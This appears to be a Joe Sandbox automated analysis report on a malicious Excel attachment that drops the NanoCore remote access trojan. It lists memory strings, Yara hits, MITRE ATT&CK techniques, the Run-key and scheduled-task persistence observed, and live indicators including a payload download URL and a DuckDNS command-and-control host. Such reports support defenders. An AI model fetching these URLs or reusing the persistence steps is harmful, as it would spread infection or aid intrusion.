Source: RegSvcs.exe, 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: mmuiqlcvwo.pif, 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0101C06C OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,	5_2_0101C06C
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_010265D3 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	5_2_010265D3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01014EFB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	5_2_01014EFB

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts2	Native API1	DLL Side-Loading1	Exploitation for Privilege Escalation1	Disable or Modify Tools111	Input Capture31	System Time Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Exploitation for Client Execution13	Valid Accounts2	DLL Side-Loading1	Deobfuscate/Decode Files or Information11	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Input Capture31	Exfiltration Over Bluetooth	Encrypted Channel11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter3	Scheduled Task/Job1	Valid Accounts2	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Clipboard Data2	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Scheduled Task/Job1	Logon Script (Mac)	Access Token Manipulation21	Software Packing12	NTDS	System Information Discovery37	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Process Injection312	DLL Side-Loading1	LSA Secrets	Security Software Discovery121	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Scheduled Task/Job1	Masquerading211	Cached Domain Credentials	Virtualization/Sandbox Evasion31	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol213	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Valid Accounts2	DCSync	Process Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Modify Registry1	Proc Filesystem	Application Window Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Virtualization/Sandbox Evasion31	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Access Token Manipulation21	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Process Injection312	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Hidden Files and Directories1	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\33920049\mmuiqlcvwo.pif	27%	Virustotal		Browse
C:\Users\user\33920049\mmuiqlcvwo.pif	32%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
6.2.RegSvcs.exe.ae0000.4.unpack	100%	Avira	TR/NanoCore.fadte	Download File
6.2.RegSvcs.exe.340000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
13.2.RegSvcs.exe.2d0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
ezeani.duckdns.org	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://demopicking.renova-sa.net/asdERTYgh56F.exe	0%	Avira URL Cloud	safe
http://secure.globalsign.net/cacert/PrimObject.crt0	0%	URL Reputation	safe
http://secure.globalsign.net/cacert/ObjectSign.crt09	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.globalsign.net/repository09	0%	URL Reputation	safe
ezeani.duckdns.org	1%	Virustotal		Browse
ezeani.duckdns.org	0%	Avira URL Cloud	safe
194.5.98.48	1%	Virustotal		Browse
194.5.98.48	0%	Avira URL Cloud	safe
http://www.globalsign.net/repository/0	0%	URL Reputation	safe
http://www.globalsign.net/repository/03	0%	URL Reputation	safe
https://demopicking.renova-sa.net/asdERTYgh56F.exe	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ezeani.duckdns.org	194.5.98.48	true	true	1%, Virustotal, Browse	unknown
demopicking.renova-sa.net	97.107.138.110	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://demopicking.renova-sa.net/asdERTYgh56F.exe	true	Avira URL Cloud: safe	unknown
ezeani.duckdns.org	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
194.5.98.48	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://demopicking.renova-sa.net/asdERTYgh56F.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://secure.globalsign.net/cacert/PrimObject.crt0	mmuiqlcvwo.pif.4.dr	false	URL Reputation: safe	unknown
http://secure.globalsign.net/cacert/ObjectSign.crt09	mmuiqlcvwo.pif.4.dr	false	URL Reputation: safe	unknown
http://www.%s.comPA	mmuiqlcvwo.pif, 00000005.00000002.666654547.0000000002F70000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.667678750.0000000005C00000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666152649.0000000001C10000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666694262.0000000003150000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://www.globalsign.net/repository09	mmuiqlcvwo.pif.4.dr	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	mmuiqlcvwo.pif, 00000005.00000002.666654547.0000000002F70000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.667678750.0000000005C00000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666152649.0000000001C10000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666694262.0000000003150000.00000002.00020000.sdmp	false		high
http://www.autoitscript.com/autoit3/0	mmuiqlcvwo.pif.4.dr	false		high
http://www.globalsign.net/repository/0	mmuiqlcvwo.pif.4.dr	false	URL Reputation: safe	unknown
http://www.globalsign.net/repository/03	mmuiqlcvwo.pif.4.dr	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.98.48	ezeani.duckdns.org	Netherlands		208476	DANILENKODE	true
97.107.138.110	demopicking.renova-sa.net	United States		63949	LINODE-APLinodeLLCUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	501830
Start date:	13.10.2021
Start time:	09:58:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Import order764536.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@16/49@20/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 28.4% (good quality ratio 27.2%) Quality average: 75.3% Quality standard deviation: 27.6%
HCA Information:	Successful, ratio: 62% Number of executed functions: 163 Number of non-executed functions: 221
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:58:35	API Interceptor	73x Sleep call for process: EQNEDT32.EXE modified
09:58:52	API Interceptor	5x Sleep call for process: vbc.exe modified
09:58:56	API Interceptor	671x Sleep call for process: mmuiqlcvwo.pif modified
09:58:58	API Interceptor	1355x Sleep call for process: RegSvcs.exe modified
09:58:59	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows element C:\Users\user\33920049\MMUIQL~1.PIF C:\Users\user\33920049\fmkkelc.omp
09:59:00	API Interceptor	2x Sleep call for process: schtasks.exe modified
09:59:01	Task Scheduler	Run new task: SMTP Service path: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" s>$(Arg0)
09:59:02	API Interceptor	446x Sleep call for process: taskeng.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
194.5.98.48	Bill of Lading, Invoice, & Packing LIsts.exe	Get hash	malicious	Browse
	Quotation Price - Double R Trading b.v.exe	Get hash	malicious	Browse
	Nizi International S.A. #New Order.exe	Get hash	malicious	Browse
	DHL Import Clearance #U2013 Consignment #6225954602.exe	Get hash	malicious	Browse
	soa5.exe	Get hash	malicious	Browse
	soa5.exe	Get hash	malicious	Browse
	PO SKP 149684.jar	Get hash	malicious	Browse
	TECHNICAL OFFERS.exe	Get hash	malicious	Browse
	17New P.O_signed.exe	Get hash	malicious	Browse
97.107.138.110	Doc7656.xlsx	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LINODE-APLinodeLLCUS	triage_dropped_file.dll	Get hash	malicious	Browse	176.58.123.25
	sora.arm	Get hash	malicious	Browse	23.239.26.18
	038159.exe	Get hash	malicious	Browse	172.105.47.42
	pKD3j672HL.exe	Get hash	malicious	Browse	172.105.103.207
	DEUXRWq2W8.exe	Get hash	malicious	Browse	172.105.103.207
	09090.xlsx	Get hash	malicious	Browse	172.105.103.207
	SecuriteInfo.com.Suspicious.Win32.Save.a.20709.dll	Get hash	malicious	Browse	139.162.232.153
	SecuriteInfo.com.W32.AIDetect.malware2.3399.dll	Get hash	malicious	Browse	139.162.232.153
	SecuriteInfo.com.W32.AIDetect.malware2.25801.dll	Get hash	malicious	Browse	139.162.232.153
	SecuriteInfo.com.W32.AIDetect.malware2.27378.dll	Get hash	malicious	Browse	139.162.232.153
	SecuriteInfo.com.Suspicious.Win32.Save.a.20709.dll	Get hash	malicious	Browse	139.162.232.153
	SecuriteInfo.com.W32.AIDetect.malware2.3399.dll	Get hash	malicious	Browse	139.162.232.153
	SecuriteInfo.com.W32.AIDetect.malware2.25801.dll	Get hash	malicious	Browse	139.162.232.153
	SecuriteInfo.com.W32.AIDetect.malware2.27378.dll	Get hash	malicious	Browse	139.162.232.153
	1tfgyRM7yM.dll	Get hash	malicious	Browse	139.162.232.153
	UTYeDO7L2W.dll	Get hash	malicious	Browse	139.162.232.153
	1tfgyRM7yM.dll	Get hash	malicious	Browse	139.162.232.153
	UTYeDO7L2W.dll	Get hash	malicious	Browse	139.162.232.153
	8205108.exe	Get hash	malicious	Browse	172.105.103.207
	dAZVcn7rdL.exe	Get hash	malicious	Browse	172.104.94.112
DANILENKODE	swift.Telex.xls	Get hash	malicious	Browse	194.5.98.95
	details.vbs	Get hash	malicious	Browse	194.5.98.206
	TWAueCcfK3.exe	Get hash	malicious	Browse	194.5.98.107
	DHL_1012617429350,pdf.exe	Get hash	malicious	Browse	194.5.97.16
	Enquiry- 0076HGF21.exe	Get hash	malicious	Browse	194.5.98.141
	DHL_1012617429350,pdf.exe	Get hash	malicious	Browse	194.5.97.16
	1012617429350,pdf.exe	Get hash	malicious	Browse	194.5.97.16
	AWB# 2617429350,pdf.exe	Get hash	malicious	Browse	194.5.97.16
	Product-inquiry6243424243_PDF.exe	Get hash	malicious	Browse	194.5.98.211
	Charter Details.vbs	Get hash	malicious	Browse	194.5.98.184
	VHp0AIIlQG.exe	Get hash	malicious	Browse	194.5.98.107
	Product-inquiry6243424243PDF.exe	Get hash	malicious	Browse	194.5.98.211
	Yeni Sipari#U015f # 765-3523663, pdf.exe	Get hash	malicious	Browse	194.5.97.16
	Nuevo pedido _WJO-001,pdf.exe	Get hash	malicious	Browse	194.5.97.16
	765-3523663 ,pdf.exe	Get hash	malicious	Browse	194.5.97.16
	Zhgafxcfrzzlbcdvuklhrmxvmcufzxktju.exe	Get hash	malicious	Browse	194.5.98.145
	Zhgafxcfrzzlbcdvuklhrmxvmcufzxktju.exe	Get hash	malicious	Browse	194.5.98.145
	Yfqbmuahufznqznknlmwfrtnauqppwcobt.exe	Get hash	malicious	Browse	194.5.98.145
	BIOBARICA OC CVE6535 TVOP-MIO 10(C) 2021,pdf..exe	Get hash	malicious	Browse	194.5.97.25
	udI2NcR8Lj.exe	Get hash	malicious	Browse	194.5.97.128

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	art-1881052385.xls	Get hash	malicious	Browse	97.107.138.110
	JrZcKXgWcl.vbs	Get hash	malicious	Browse	97.107.138.110
	doc-379851424.xls	Get hash	malicious	Browse	97.107.138.110
	doc-220808714.xls	Get hash	malicious	Browse	97.107.138.110
	INV.ppt	Get hash	malicious	Browse	97.107.138.110
	Purchase Order .xlsx	Get hash	malicious	Browse	97.107.138.110
	MV JOLLY EXPRESS.docx	Get hash	malicious	Browse	97.107.138.110
	DHL_Delivery_Notification.doc	Get hash	malicious	Browse	97.107.138.110
	FedEx AWB 884174658339.doc	Get hash	malicious	Browse	97.107.138.110
	UPDATE INVOICE FM K & S INDUSTRY.docx	Get hash	malicious	Browse	97.107.138.110
	PO 347391.docx	Get hash	malicious	Browse	97.107.138.110
	swift.Telex.xls	Get hash	malicious	Browse	97.107.138.110
	Invoice number 1257MAJAKFVII2021 incl. VAT.doc	Get hash	malicious	Browse	97.107.138.110
	Consignment Notification.doc	Get hash	malicious	Browse	97.107.138.110
	RFQ87976VF.doc	Get hash	malicious	Browse	97.107.138.110
	RFQPTD0075453423.doc	Get hash	malicious	Browse	97.107.138.110
	F#U0130YAT TEKL#U0130F#U0130 FORMU.doc	Get hash	malicious	Browse	97.107.138.110
	CONTRACT 0902021.doc	Get hash	malicious	Browse	97.107.138.110
	PO006237_2nd Shipment.docx	Get hash	malicious	Browse	97.107.138.110
	sample.exe	Get hash	malicious	Browse	97.107.138.110

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\33920049\mmuiqlcvwo.pif	KRSEL0000056286.JPG.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\RegSvcs.exe	PI.xlsx	Get hash	malicious	Browse
	swift.xls	Get hash	malicious	Browse
	PENDING INVOICES.doc	Get hash	malicious	Browse
	RFQ-2201847.xlsx	Get hash	malicious	Browse
	Postal Financial Services.doc	Get hash	malicious	Browse
	85a3f6aa_by_Libranalysis.rtf	Get hash	malicious	Browse
	Files Specification.xlsx	Get hash	malicious	Browse
	Update of the OFFICE PACK.xlam	Get hash	malicious	Browse
	Quotation Assurance.doc	Get hash	malicious	Browse
	Update of the OFFICE PACK.doc	Get hash	malicious	Browse
	DHL Documents 7.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\33920049\aauo.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	512
Entropy (8bit):	5.6047097806645825
Encrypted:	false
SSDEEP:	12:o9RRQXCGiB+IGihOZEkUYz8laDkucQq1wA3RT8jTW:oPRuCh8OEZEdwkucZ1w2T8jS
MD5:	3A48081CF7D4D709399A376B3A8AADF2
SHA1:	E0D7DDAA464FC3565D92DF4ECC7BD30286D519CA
SHA-256:	7EBB903522348C2326DFFBC66B5D20C8E7C120C4D7CEE15640CAE5187C5741C0
SHA-512:	4B0077AD1E29FC4C7703B7525167ABB1A80E409D7E4685EA977689B3DE12CF5CFA02BB843D62E1EA391F18FF4C609D66262116E01B52C59616E3A266F0E40726
Malicious:	false
Reputation:	low
